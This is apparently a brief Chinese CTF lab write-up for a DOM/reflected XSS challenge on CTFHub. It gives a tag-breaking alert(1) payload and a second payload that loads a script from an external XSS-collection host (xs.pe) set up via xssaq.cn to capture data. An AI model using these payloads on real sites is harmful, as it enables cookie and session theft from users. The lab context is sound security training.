根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
jump_jump15 小时前
妙用 localeCompare 获取汉字拼音首字母U.2 SSD15 小时前
Echarts单轴坐标系散点图德育处主任Pro15 小时前
前端玩转大模型,DeepSeek-R1 蒸馏 Llama 模型的 Bedrock 部署Jedi Hongbin15 小时前
Three.js NodeMaterial 节点材质系统文档前端小马16 小时前
前后端Long类型ID精度丢失问题用户14567756103716 小时前
干净的图片批量处理,处理速度飞快用户14567756103716 小时前
亲测好用!简单实用的图片尺寸调整工具索西引擎16 小时前
npm、yarn、pnpm天生我材必有用_吴用17 小时前
Vue3 + VitePress 搭建组件库文档平台(结合 Element Plus 与 Arco Design Vue)—— 超详细图文教程liu****17 小时前
基于websocket的多用户网页五子棋(八)